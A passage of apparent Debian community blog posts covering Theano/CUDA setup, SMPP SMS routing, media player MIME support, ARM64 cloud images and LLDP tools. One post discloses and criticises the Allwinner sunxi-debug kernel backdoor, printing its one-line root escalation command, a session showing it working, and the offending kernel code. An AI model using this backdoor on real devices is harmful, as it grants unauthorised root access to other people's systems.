If the used Python version changed like in this example you might to want to purge obsolete cache. For working with the cache resp. the compiledirs, the helper theano-cache comes in handy. If you invoke it without any arguments the current cache location is put out like ~/.theano/compiledir_Linux-4.5--amd64-x86_64-with-debian-stretch-sid--2.7.12-64 (the script is run from /usr/share/python-theano). So, the compiledirs for the old Python versions in this example (11+ and 12rc1) can be removed to free the space they occupy. All compiledirs resp. cache directories meaning the whole cache could be erased by $ theano-cache basecompiledir purge, the effect is the same as by performing $ rm -rf ~/.theano. You might want to do that e.g. if you're using different hardware, like when you got yourself another graphics card. Or habitual from time to time when the compiledirs fill up so much that it slows down processing with the harddisk being very busy all the time, if you don't have an SSD drive available. For example, the disk space of build chroots carrying (mainly) the tests completely compiled through on default Python 2 and Python 3 consumes around 1.3 GB (see here). BLAS implementations Theano needs a level 3 implementation of BLAS (Basic Linear Algebra Subprograms) for operations between vectors (one-dimensional mathematical objects) and matrices (two-dimensional objects) carried out on the CPU. NumPy is already build on BLAS and pulls the standard implementation (libblas3, soure package: lapack), but Theano links directly to it instead of using NumPy as intermediate layer to reduce the computational overhead. For this, Theano needs development headers and the binary packages pull libblas-dev by default, if any other development package of another BLAS implementation (like OpenBLAS or ATLAS) isn't already installed, or pulled with them (providing the virtual package The linker flags could be manipulated directly through the configuration switch config.blas.ldflags, which is by default set to -L/usr/lib -lblas -lblas. By the way, if you set it to an empty value, Theano falls back to using BLAS through NumPy, if you want to have that for some reason. On Debian, there is a very convenient way to switch between BLAS implementations by the alternatives mechanism. If you have several alternative implementations installed at the same time, you can switch from one to another easily by just doing:
$ sudo update-alternatives --config
There are 3 choices for the alternative (providing /usr/lib/
  Selection    Path                                  Priority   Status
* 0            /usr/lib/openblas-base/      40        auto mode
  1            /usr/lib/atlas-base/atlas/   35        manual mode
  2            /usr/lib/libblas/            10        manual mode
  3            /usr/lib/openblas-base/      40        manual mode
Press <enter> to keep the current choice[*], or type selection number:
The implementations are performing differently on different hardware, so you might want to take the time to compare which one does it best on your processor (the other packages are libatlas-base-dev and libopenblas-dev), and choose that to optimize your system. If you want to squeeze out all which is in there for carrying out Theano's computations on the CPU, another option is to compile an optimized version of a BLAS library especially for your processor. I'm going to write another blog posting on this issue. The binary packages of Theano ship the script to check over how well a BLAS implementation performs with it, and if everything works right. That script is located in the misc subfolder of the library, you could locate it by doing $ dpkg -L python-theano grep check_blas (or for the package python3-theano accordingly), and run it with the Python interpreter. By default the scripts puts out a lot of info like a huge perfomance comparison reference table, the current setting of blas.ldflags, the compiledir, the setting of floatX, OS information, the GCC version, the current NumPy config towards BLAS, NumPy location and version, if Theano linked directly or has used the NumPy binding, and finally and most important, the execution time. If just the execution time for quick perfomance comparisons is needed this script could be invoked with -q. Theano on CUDA The function compiler of Theano works with alternative backends to carry out the computations, like the ones for graphics cards. Currently, there are two different backends for GPU processing available, one docks onto NVIDIA's CUDA (Compute Unified Device Architecture) technology7, and another one for libgpuarray, which is also developed by the Theano developers in parallel. The libgpuarray library is an interesting alternative for Theano, it's a GPU tensor (multi-dimensional mathematical object) array written in C with Python bindings based on Cython, which has the advantage of running also on OpenCL8. OpenCL, unlike CUDA9, is full free software, vendor neutral and overcomes the limitation of the CUDA toolkit being only available for amd64 and the ppc64el port (see here). I've opened an ITP on libgpuarray and we'll see if and how this works out. Another reason for it would be great to have it available is that it looks like CUDA currently runs into problems with GCC 610. More on that, soon. Here's a litle checklist for setting up your CUDA device so that you don't have to experience something like this:
$ THEANO_FLAGS=device=gpu,floatX=float32 python ./ 
WARNING (theano.sandbox.cuda): CUDA is installed, but device gpu is not available (error: Unable to get the number of gpus available: no CUDA-capable device is detected)
hardware check For running Theano on CUDA you need an NVIDIA graphics card which is capable of doing that. You can recheck if your device is supported by CUDA here. When the hardware isn't too old (CUDA support started with GeForce 8 and Quadro X series) or too strange I think it isn't working only in exceptional cases. You can check your model and if the device is present in the system on the bare hardware level by doing this:
$ lspci   grep -i nvidia
04:00.0 3D controller: NVIDIA Corporation GM108M [GeForce 940M] (rev a2)
If a line like this doesn't get returned, your device most probably is broken, or not properly connected (ouch). If rev ff appears at the end of the line that means the device is off meaning powered down. This might be happening if you have a laptop with Optimus graphics hardware, and the related drivers have switched off the unoccupied device to safe energy11. kernel module Running CUDA applications requires the proprietary NVIDIA driver kernel module to be loaded into the kernel and working. If you haven't already installed it for another purpose, the NVIDIA driver and the CUDA toolkit are both in the non-free section of the Debian archive, which is not enabled by default. To get non-free packages you have to add non-free (and it's better to do so, also contrib) to your package source in /etc/apt/sources.list, which might then look like this:
deb testing main contrib non-free
After doing that, perform $ apt-cache update to update the package lists, and there you go with the non-free packages. The headers of the running kernel are needed to compile modules, you can get them together with the NVIDIA kernel module package by running:
$ sudo apt-get install linux-headers-$(uname -r) nvidia-kernel-dkms build-essential
DKMS will then build the NVIDIA module for the kernel and does some other things on the system. When the installation has finished, it's generally advised to reboot the system completely. troubleshooting If you have problems with the CUDA device, it's advised to verify if the following things concerning the NVIDIA driver resp. kernel module are in order: blacklist nouveau Check if the default Nouveau kernel module driver (which blocks the NVIDIA module) for some reason still gets loaded by doing $ lsmod grep nouveau. If nothing gets returned, that's right. If it's still in the kernel, just add blacklist nouveau to /etc/modprobe.d/blacklist.conf, and update the booting ramdisk with sudo update-initramfs -u afterwards. Then reboot once more, this shouldn't be the case then anymore. rebuild kernel module To fix it when the module haven't been properly compiled for some reason you could trigger a rebuild of the NVIDIA kernel module with $ sudo dpkg-reconfigure nvidia-kernel-dkms. When you're about to send your hardware in to repair because everything looks all right but the device just isn't working, that really could help (own experience). After the rebuild of the module or modules (if you have a few kernel packages installed) has completed, you could recheck if the module really is available by running:
$ sudo modinfo nvidia-current
filename:       /lib/modules/4.4.0-1-amd64/updates/dkms/nvidia-current.ko
alias:          char-major-195-*
version:        352.79
supported:      external
license:        NVIDIA
alias:          pci:v000010DEd00000E00sv*sd*bc04sc80i00*
alias:          pci:v000010DEd*sv*sd*bc03sc02i00*
alias:          pci:v000010DEd*sv*sd*bc03sc00i00*
depends:        drm
vermagic:       4.4.0-1-amd64 SMP mod_unload modversions 
parm:           NVreg_Mobile:int
It should be something similiar to this when everything is all right. reload kernel module When there are problems with the GPU, maybe the kernel module isn't properly loaded. You could recheck if the module has been properly loaded by doing
$ lsmod   grep nvidia
nvidia_uvm             73728  0
nvidia               8540160  1 nvidia_uvm
drm                   356352  7 i915,drm_kms_helper,nvidia
The kernel module could be loaded resp. reloaded with $ sudo nvidia-modprobe (that tool is from the package nvidia-modprobe). unsupported graphics card Be sure that you graphics cards is supported by the current driver kernel module. If you have bought new hardware, that's quite possible to come out being a problem. You can get the version of the current NVIDIA driver with:
$ cat /proc/driver/nvidia/version 
NVRM version: NVIDIA UNIX x86_64 Kernel Module 352.79  Wed Jan 13 16:17:53 PST 2016
GCC version:  gcc version 5.3.1 20160528 (Debian 5.3.1-21)
Then, google the version number like nvidia 352.79, this should get you onto an official driver download page like this. There, check for what's to be found under "Supported Products". I you're stuck with that there are two options, to wait until the driver in Debian got updated, or replace it with the latest driver package from NVIDIA. That's possible to do, but something more for experienced users. occupied graphics card The CUDA driver cannot work while the graphical interface is busy like by processing the graphical display of your X.Org server. Which kernel driver actually is used to process the desktop could be examined by this command:12
$ grep '(II).*([0-9]):' /var/log/Xorg.0.log
[    37.700] (II) intel(0): Using Kernel Mode Setting driver: i915, version 1.6.0 20150522
[    37.700] (II) intel(0): SNA compiled: xserver-xorg-video-intel 2:2.99.917-2 (Vincent Cheng <>)
[    39.808] (II) intel(0): switch to mode 1920x1080@60.0 on eDP1 using pipe 0, position (0, 0), rotation normal, reflection none
[    39.810] (II) intel(0): Setting screen physical size to 508 x 285
[    67.576] (II) intel(0): EDID vendor "CMN", prod id 5941
[    67.576] (II) intel(0): Printing DDC gathered Modelines:
[    67.576] (II) intel(0): Modeline "1920x1080"x0.0  152.84  1920 1968 2000 2250  1080 1083 1088 1132 -hsync -vsync (67.9 kHz eP)
This example shows that the rendering of the desktop is performed by the graphical device of the Intel CPU, which is just like it's needed for running CUDA applications on your NVIDIA graphics card, if you don't have another one. nvidia-cuda-toolkit With the Debian package of the CUDA toolkit everything pretty much runs out of the box for Theano. Just install it with apt-get, and you're ready to go, the CUDA backend is the default one. Pycuda is also a suggested dependency of the binary packages, it could be pulled together with the CUDA toolkit. The up-to-date CUDA release 7.5 is of course available, with that you have Maxwell architecture support so that you can run Theano on e.g. a GeForce GTX Titan X with 6,2 TFLOPS on single precision13 at an affordable price. CUDA 814 is around the corner with support for the new Pascal architecture15. Like the GeForce GTX 1080 high-end gaming graphics card already has 8,23 TFLOPS16. When it comes to professional GPGPU hardware like the Tesla P100 there is much more computational power available, scalable by multiplication of cores resp. cards up to genuine little supercomputers which fit on a desk, like the DGX-117. Theano can use multiple GPUs for calculations to work with highly scaled hardware, I'll write another blog post on this issue. Theano on the GPU It's not difficult to run Theano on the GPU. Only single precision floating point numbers (float32) are supported on the GPU, but that is sufficient for deep learning applications. Theano uses double precision floats (float64) by default, so you have to set the configuration variable config.floatX to float32, like written on above, either with the THEANO_FLAGS environment variable or better in your .theanorc file, if you're going to use the GPU a lot. Switching to the GPU actually happens with the config.device configuration variable, which must be set to either gpu or gpu0, gpu1 etc., to choose a particular one if multiple devices are available. Here's is a little test script, it's taken from the docs and slightly altered. You can run that script either with python or python3 (there was a single test failure on the Python 3 package, so the Python 2 library might be a little more stable currently). For comparison, here's an example on how it perfoms on my hardware, one time on the CPU, one more time on the GPU:
$ THEANO_FLAGS=floatX=float32 python ./ 
[Elemwise exp,no_inplace (<TensorType(float32, vector)>)]
Looping 1000 times took 4.481719 seconds
Result is [ 1.23178029  1.61879337  1.52278066 ...,  2.20771813  2.29967761
Used the cpu
$ THEANO_FLAGS=floatX=float32,device=gpu python ./ 
Using gpu device 0: GeForce 940M (CNMeM is disabled, cuDNN not available)
[GpuElemwise exp,no_inplace (<CudaNdarrayType(float32, vector)>), HostFromGpu(GpuElemwise exp,no_inplace .0)]
Looping 1000 times took 1.164906 seconds
Result is [ 1.23178029  1.61879349  1.52278066 ...,  2.20771813  2.29967761
Used the gpu
If you got a result like this you're ready to go with Theano on Debian, training computer vision classifiers or whatever you want to do with it. I'll write more on for what Theano could be used, soon.

  1. Some ports are disabled because they are currently not supported by Theano. There are NotImplementedErrors and other errors in the tests on the numpy.ndarray object being not aligned. The developers commented on that, see here. And on some ports the build flags -m32 resp. -m64 of Theano aren't supported by g++, the build flags can't be manipulated easily.
  2. Theano Development Team: "Theano: a Python framework for fast computation of mathematical expressions"
  3. Marc Couture: "Today's high-powered GPUs: strong for graphics and for maths". In: RTC magazine June 2015, pp. 22 25
  4. Ogier Maitre: "Understanding NVIDIA GPGPU hardware". In: Tsutsui/Collet (eds.): Massively parallel evolutionary computation on GPGPUs. Berlin, Heidelberg: Springer 2013, pp. 15-34
  5. Geoffrey French: "Deep learing tutorial: advanved techniques". PyData London 2016 presentation
  6. Like the description of the Lintian tag binary-without-manpage says, that's not needed for them being in /usr/share.
  7. Tom. R. Halfhill: "Parallel processing with CUDA: Nvidia's high-performance computing platform uses massive multithreading". In: Microprocessor Report January 28, 2008
  8. Faber "Parallelwelten: GPU-Programmierung mit OpenCL". In: C't 26/2014, pp. 160-165
  9. For comparison, see: Valentine Sinitsyn: "Feel the taste of GPU programming". In: Linux Voice February 2015, pp. 106-109
  11. If Optimus (hybrid) graphics hardware is present (like commonly today on PC laptops), Debian launches the X-server on the graphics processing unit of the CPU, which is ideal for CUDA. The problem with Optimus actually is the graphics processing on the dedicated GPU. If you are using Bumblebee, the Python interpreter which you want to run Theano on has be to be started with the launcher primusrun, because Bumblebee powers the GPU down with the tool bbswitch every time it isn't used, and I think also the kernel module of the driver is dynamically loaded.
  12. Thorsten Leemhuis: "Treiberreviere. Probleme mit Grafiktreibern f r Linux l sen": In: C't Nr.2/2013, pp. 156-161
  13. Martin Fischer: "4K-Rakete: Die schnellste Single-GPU-Grafikkarte der Welt". In C't 13/2015, pp. 60-61
  15. Martin Fischer: "All In: Nvidia enth llt die GPU-Architektur 'Pascal'". In: C't 9/2016, pp. 30-31
  16. Martin Fischer: "Turbo-Pascal: High-End-Grafikkarte f r Spieler: GeForce GTX 1080". In: C't 13/2016, pp. 100-103

6 July 2016

Daniel Pocock: Avoiding SMS vendor lock-in with SMPP

There is increasing demand for SMS notifications about monitoring alerts, trading notifications, flight delays and other events. Various companies are offering SMS transmission services to meet this demand and many of them aggressively pushing their own proprietary interfaces to the SMS world rather than using the more open and widely supported SMPP. There is good reason for this: if users write lots of of scripts to access the REST API of an SMS service, the users won't be able to change their service provider without having to change all their code. Well, that is good if you are an SMPP vendor but not if you are their customer. If an SMS gateway company goes out of business or has a system meltdown, the customers linked to their REST API will have a much bigger effort to migrate to a new provider than those using SMPP. The HTTP REST APIs offered by many vendors hide some details of the SMS protocol and payload. At first glance, this may feel easier. In fact, this leads to unpredictable results when delivering messages to users in different countries and different character sets/languages. It is better to start with SMPP from the beginning and avoid discovering those pitfalls later. The SMS Router free/open source software project helps overcome the SMPP learning curve by using APIs you are already familiar with. More troublesome for large organizations, some of the REST APIs offered by SMS gateways want to make callbacks to your own servers: this means your servers need public IP addresses accessible from the Internet. In some organizations that can take months to organize. SMPP works over one or more outgoing TCP connections initiated from your own server(s) and doesn't require any callback connections from the SMPP gateway. SMS Router lets SMS users have the best of both worlds: the flexibility of linking to any provider who supports SMPP and the convenience of putting messages into the system using any of the transports supported by an Apache Camel component. Popular examples include camel-jms (JMS) for Java and J2EE users, STOMP for scripting languages, camel-mail (SMTP and IMAP) for email integration and camel-sip (SIP) or camel-xmpp (XMPP) for chat/instant messaging systems. If you really want to, you can also create your own in-house HTTP REST API too using camel-restlet for internal applications. In all these cases, SMS Router always uses standard SMPP to reach any gateway of your choice. Architecture overview SMS Router is based on Apache Camel. Multiple instances can be operated in parallel for clustering, load balancing and high availability. It can be monitored using JMX solutions such as JMXetric. The SMPP support is based on the camel-smpp component which is in turn based on the jSMPP library, which comprehensively implements the SMPP protocol in Java. camel-smpp can be used with minimal configuration but for those who want to, many SMPP features can be tweaked on a per-message basis using various headers. The SMPP gateway settings can be configured and changed at will using the file. The process doesn't require any other files or databases at runtime. The SMS Router is ready-to-run with one queue for sending messages and another queue for incoming messages. The routing logic can be customized by editing the RouteBuilder class to use other Camel components or any of Camel's wide range of functions for inspecting, modifying and routing messages. For example, you can extend it to failover to multiple SMPP gateways using Camel's load-balancer pattern. SMS Router based projects are already used successfully in production, for example, the user registration mechanism for the Lumicall secure VoIP app for Android. Getting started See the README for instructions. Feel free to ask questions about this project on the Camel users mailing list. Disclaimer SMS is not considered secure, the SMS Router developers and telecommunications industry experts discourage the use of this technology for two-factor authentication. Please see the longer disclaimer in the README file and my earlier blog about SMS logins: an illusion of security. The bottom line: if your application is important enough to need two-factor authentication, do it correctly using smart cards or tokens. There are many popular free software projects based on these full cryptographic solutions, for example, the oath-toolkit and dynalogin.

6 June 2016

Petter Reinholdtsen: The new "best" multimedia player in Debian?

When I set out a few weeks ago to figure out which multimedia player in Debian claimed to support most file formats / MIME types, I was a bit surprised how varied the sets of MIME types the various players claimed support for. The range was from 55 to 130 MIME types. I suspect most media formats are supported by all players, but this is not really reflected in the MimeTypes values in their desktop files. There are probably also some bogus MIME types listed, but it is hard to identify which one this is. Anyway, in the mean time I got in touch with upstream for some of the players suggesting to add more MIME types to their desktop files, and decided to spend some time myself improving the situation for my favorite media player VLC. The fixes for VLC entered Debian unstable yesterday. The complete list of MIME types can be seen on the Multimedia player MIME type support status Debian wiki page. The new "best" multimedia player in Debian? It is VLC, followed by totem, parole, kplayer, gnome-mpv, mpv, smplayer, mplayer-gui and kmplayer. I am sure some of the other players desktop files support several of the formats currently listed as working only with vlc, toten and parole. A sad observation is that only 14 MIME types are listed as supported by all the tested multimedia players in Debian in their desktop files: audio/mpeg, audio/vnd.rn-realaudio, audio/x-mpegurl, audio/x-ms-wma, audio/x-scpls, audio/x-wav, video/mp4, video/mpeg, video/quicktime, video/vnd.rn-realvideo, video/x-matroska, video/x-ms-asf, video/x-ms-wmv and video/x-msvideo. Personally I find it sad that video/ogg and video/webm is not supported by all the media players in Debian. As far as I can tell, all of them can handle both formats.

14 May 2016

Gunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems

In the ARM world, to which I am still mostly a newcomer (although I've been already playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed. Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux. In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingenier a, UNAM. It has been quite successful And fun. Anyway, one of the points we make emphasis on to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot an irony. As part of the "Linux Userspace" and "Boot process" modules, we make a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system: Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... The people we already know and trust to do this kind of work! Most current ARM chips cannot run with the stock, upstream Linux kernel. Then require a set of patches that different vendors pile up to support their basic hardware (remember those systems are almost always systems-on-a-chip (SoC)). Some vendors do take the hard work to try to upstream their changes that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it. So, in many cases, we are stuck running with nonstandard kernels, full with huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right? Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel. This kernel has a very ugly flaw: A debugging mode left open, that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:
  1. Debian GNU/Linux 8 bananapi ttyS0
  2. banana login: gwolf
  3. Password:
  4. Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
  5. Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l
  6. The programs included with the Debian GNU/Linux system are free software;
  7. the exact distribution terms for each program are described in the
  8. individual files in /usr/share/doc/*/copyright.
  9. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  10. permitted by applicable law.
  11. gwolf@banana:~$ id
  12. uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
  13. gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
  14. gwolf@banana:~$ id
  15. groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)
Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):
  1. if(!strncmp("rootmydevice",(char*)buf,12))
  2. cred = (struct cred *)__task_cred(current);
  3. cred->uid = 0;
  4. cred->gid = 0;
  5. cred->suid = 0;
  6. cred->euid = 0;
  7. cred->euid = 0;
  8. cred->egid = 0;
  9. cred->fsuid = 0;
  10. cred->fsgid = 0;
  11. printk("now you are root\n");
Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files lack from this same basic issue and having this upstreamed will become a titanic task. If their programmers tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work. Anyway, enough said by me. Some other sources of information: There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

9 May 2016

Riku Voipio: Booting ubuntu 16.04 cloud images on Arm64

For testing kvm/qemu, prebaked images cloud images are nice. However, there is a few steps to get started. First we need a recent Qemu (2.5 is good enough). An efi firmware is needed, and cloud-utils, for customizing our VM.

sudo apt install -y qemu qemu-utils cloud-utils
Cloud images are plain - there is no user setup, no default user/pw combo, so to log in to the image, we need to customize the image on first boot. The defacto tool for this is cloud-init. The simplest method for using cloud-init is passing a block media with a settings file - of course for real cloud deployment, you would use one of fancy network based initialization protocols cloud-init supports. Enter the following to a file, say cloud.txt:


- name: you
- ssh-rsa AAAAB3Nz....
groups: sudo
shell: /bin/bash
This minimal config will just set you a user with ssh key. A more complex setup can install packages, write files and run arbitrary commands on first boot. In professional setups, you would most likely end up using cloud-init only to start Ansible or another configuration management tool.

cloud-localds cloud.img cloud.txt
qemu-system-aarch64 -smp 2 -m 1024 -M virt -bios QEMU_EFI.fd -nographic \
-device virtio-blk-device,drive=image \
-drive if=none,id=image,file=xenial-server-cloudimg-arm64-uefi1.img \
-device virtio-blk-device,drive=cloud \
-drive if=none,id=cloud,file=cloud.img \
-netdev user,id=user0 -device virtio-net-device,netdev=user0 -redir tcp:2222::22 \
-enable-kvm -cpu host
If you are on an X86 host and want to use qemu to run an aarch64 image, replace the last line with "-cpu cortex-a57". Now, since the example uses user networking with tcp port redirect, you can ssh into the VM:

ssh -p 2222 you@localhost
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-22-generic aarch64)

8 May 2016

Petter Reinholdtsen: What is the best multimedia player in Debian?

Where I set out to figure out which multimedia player in Debian claim support for most file formats. A few years ago, I had a look at the media support for Browser plugins in Debian, to get an idea which plugins to include in Debian Edu. I created a script to extract the set of supported MIME types for each plugin, and used this to find out which multimedia browser plugin supported most file formats / media types. The result can still be seen on the Debian wiki, even though it have not been updated for a while. But browser plugins are less relevant these days, so I thought it was time to look at standalone players. A few days ago I was tired of VLC not being listed as a viable player when I wanted to play videos from the Norwegian National Broadcasting Company, and decided to investigate why. The cause is a missing MIME type in the VLC desktop file. In the process I wrote a script to compare the set of MIME types announced in the desktop file and the browser plugin, only to discover that there is quite a large difference between the two for VLC. This discovery made me dig up the script I used to compare browser plugins, and adjust it to compare desktop files instead, to try to figure out which multimedia player in Debian support most file formats. The result can be seen on the Debian Wiki, as a table listing all MIME types supported by one of the packages included in the table, with the package supporting most MIME types being listed first in the table. The best multimedia player in Debian? It is totem, followed by parole, kplayer, mpv, vlc, smplayer mplayer-gui gnome-mpv and kmplayer. Time for the other players to update their announced MIME support?

27 April 2016

Stig Sandbeck Mathisen: Using LLDP on Linux. What's on the other side?

On any given server, or workstation, knowing what is at the other end of the network cable is often very useful. There s a protocol for that: LLDP. This is a link layer protocol, so it is not routed. Each end transmits information about itself periodically. You can typically see the type of equipment, the server or switch name, and the network port name of the other end, although there are lots of other bits of information available, too. This is often used between switches and routers in a server centre, but it is useful to enable on server hardware as well. There are a few different packages available. I ve looked at a few of them available for the RedHat OS family (Red Hat Enterprise Linux, CentOS, ) as well as the Debian OS family (Debian, Ubuntu, ) (Updated 2016-04-29, added more recent information about lldpd, and gathered the switch output at the end.)

ladvd A simple daemon, with no configuration needed. This runs as a privilege-separated daemon, and has a command line control utility. You invoke it with a list of interfaces as command line arguments to restrict the interfaces it should use. ladvd is not available on RedHat, but is available on Debian. Install the ladvd package, and run ladvdc to query the daemon for information.
root@turbotape:~# ladvdc
Capability Codes:
    r - Repeater, B - Bridge, H - Host, R - Router, S - Switch,
    W - WLAN Access Point, C - DOCSIS Device, T - Telephone, O - Other
Device ID        Local Intf Proto Hold-time Capability Port ID
office1-switch23 eno1       LLDP  98        B          42
Even better, it has output that can be parsed for scripting:
root@turbotape:~# ladvdc -b eno1
my new favourite :)

lldpd Another package is lldpd , which is also simple to configure and use. lldpd is not available on RedHat, but it is present on Debian. It features a command line interface, lldpcli , which can show output with different level of detail, and on different formats, as well as configure the running daemon.
root@turbotape:~# lldpcli show neighbors
LLDP neighbors:
Interface:    eno1, via: LLDP, RID: 1, Time: 0 day, 00:00:59
    ChassisID:    mac 00:11:22:33:44:55
    SysName:      office1-switch23
    SysDescr:     ProCurve J9280A Switch 2510G-48, revision Y.11.12, ROM N.10.02 (/sw/code/build/cod(cod11))
    Capability:   Bridge, on
    PortID:       local 42
    PortDescr:    42
Among the output formats are json , which is easy to re-use elsewhere.
root@turbotape:~# lldpcli -f json show neighbors
            "descr": "ProCurve J9280A Switch 2510G-48, revision Y.11.12, ROM N.10.02 (/sw/code/build/cod(cod11))",
              "type": "mac",
              "value": "00:11:22:33:44:55"
              "type": "Bridge",
              "enabled": true
        "via": "LLDP",
        "rid": "1",
        "age": "0 day, 00:53:23",
          "descr": "42",
            "type": "local",
            "value": "42"

lldpad A much more featureful LLDP daemon, available for both the Debian and RedHat OS families. This has lots of features, but is less trivial to set up.

Configure lldp for each interface
find /sys/class/net/ -maxdepth 1 -name 'en*'  
    while read device; do
        basename "$device"
    while read interface; do
            lldptool set-lldp -i "$interface" adminStatus=rxtx
            for item in sysName portDesc sysDesc sysCap mngAddr; do
                lldptool set-tlv -i "$interface" -V "$item" enableTx=yes  
                    sed -e "s/^/$item /"
            sed -e "s/^/$interface /"

Show LLDP neighbor information
find /sys/class/net/ -maxdepth 1 -name 'en*'  
    while read device; do
        basename "$device"
    while read interface; do
        printf "%s\n" "$interface"
        ethtool $interface   grep -q 'Link detected: yes'    
            echo "  down"
        lldptool get-tlv -n -i "$interface"   sed -e "s/^/  /"
  Chassis ID TLV
    MAC: 01:23:45:67:89:ab
  Port ID TLV
    Local: 588
  Time to Live TLV
  System Name TLV
  System Description TLV
    Juniper Networks, Inc. ex2200-48t-4g , version 12.3R12.4 Build date: 2016-01-20 05:03:06 UTC
  System Capabilities TLV
    System capabilities:  Bridge, Router
    Enabled capabilities: Bridge, Router
  Management Address TLV
    Ifindex: 36
    OID: $
  Port Description TLV
    some important server, port 4
  MAC/PHY Configuration Status TLV
    Auto-negotiation supported and enabled
    PMD auto-negotiation capabilities: 0x0001
    MAU type: Unknown [0x0000]
  Link Aggregation TLV
    Aggregation capable
    Currently aggregated
    Aggregated Port ID: 600
  Maximum Frame Size TLV
    PVID: 2000
    VID 2000: Name bumblebee
    VID 2001: Name stumblebee
    VID 2002: Name fumblebee
  LLDP-MED Capabilities TLV
    Device Type:  netcon
    Capabilities: LLDP-MED, Network Policy, Location Identification, Extended Power via MDI-PSE

on the switch side On the switch, it is a bit easier to see what s connected to each interface:

office switch On the switch side, this system looks like:
office1-switch23# show lldp info remote-device
 LLDP Remote Devices Information
  LocalPort   ChassisId                 PortId PortDescr SysName
  --------- + ------------------------- ------ --------- ----------------------
  42          22 33 44 55 66 77         eno1   Intel ...
office1-switch23# show lldp info remote-device 42
 LLDP Remote Device Information Detail
  Local Port   : 42
  ChassisType  : mac-address
  ChassisId    : 00 11 22 33 33 55
  PortType     : interface-name
  PortId       : eno1
  SysName      :
  System Descr : Debian GNU/Linux testing (stretch) Linux 4.5.0-1-amd64 #1...
  PortDescr    : Intel Corporation Ethernet Connection I217-LM
  System Capabilities Supported  : bridge, router
  System Capabilities Enabled    : bridge, router
  Remote Management Address
     Type    : ipv4
     Address :
     Type    : ipv6
     Address : 20 01 0d b8 00 00 00 00 00 00 00 00 00 00 00 01
     Type    : all802
     Address : 22 33 44 55 66 77

datacenter switch
ssm@site3-row2-rack1> show lldp neighbors
Local Interface    Parent Interface    Chassis Id          Port info          System Name
ge-0/0/38.0        ae1.0               01:23:45:67:89:58   Interface   2 as enp3s0f0
ge-1/0/38.0        ae1.0               01:23:45:67:89:58   Interface   3 as enp3s0f1
ssm@site3-row2-rack1> show lldp neighbors interface ge-0/0/38
LLDP Neighbor Information:
Local Information:
Index: 157 Time to live: 120 Time mark: Fri Apr 29 13:00:19 2016 Age: 24 secs
Local Interface    : ge-0/0/38.0
Parent Interface   : ae1.0
Local Port ID      : 588
Ageout Count       : 0
Neighbour Information:
Chassis type       : Mac address
Chassis ID         : 01:23:45:67:89:58
Port type          : Mac address
Port ID            : 01:23:45:67:89:58
Port description   : Interface   2 as enp3s0f0
System name        :
System Description : Linux 3.10.0-327.13.1.el7.x86_64 #1 SMP Thu Mar 4
System capabilities
        Supported  : Station Only
        Enabled    : Station Only
Management Info
        Type              : IPv6
        Address           : 2001:0db8:0000:0000:0000:dead:beef:cafe
        Port ID           : 2
        Subtype           : 2
        Interface Subtype : ifIndex(2)
        OID               :

11 September 2015

Daniel Pocock: Payment for shadow work

A significant court ruling yesterday means that companies in the EU have to pay employees for time spent traveling to and from work. If something seems too good to be true, it usually is. Once you get past the headline, you find that it only applies to workers who are going to appointments outside their workplace. Some companies have been careless about scheduling such appointments, sometimes leaving an employee more than 2 hours from his home at the end of the day and this new ruling may just force them to either try a little harder to schedule appointments with consideration for the employee or pay for the extra time if excessive travel sometimes occurs. The ruling may be good news for IT workers, road congestion and the environment. With companies now becoming more efficient in managing travel time, they may well need to improve the software they use for scheduling the employee's time. With certain types of employee potentially having a shorter journey after the last appointment, this means less road congestion and less pollution. Professionals who have to fly may also be taking note: if you work in Paris but have to fly to London one day for meetings, then your working time starts when you leave your home at 05:30 and finishes at 22:00 when you get home. Shadow work comes in many forms It is good to see society taking note of the hidden cost of shadow work. What about all those other nasty and inefficient practices that take time but you don't get paid for them? Have you ever wondered why some companies send bills and statements to you by email or post, but others expect you to waste 5 minutes of your time logging in to their web site to download the bill or statement? Should people be paid for this time too and would that force these companies to stop being so lazy? Some companies have been trying to avoid doing the right thing by arguing that email is not secure, but this just doesn't add up: the original PGP MIME specs for email encryption were published through the IETF process in 1996. Barclaycard recently began offering to send credit card statements using encrypted PDF, proving that many of the excuses given by other companies are just that: excuses. For developers 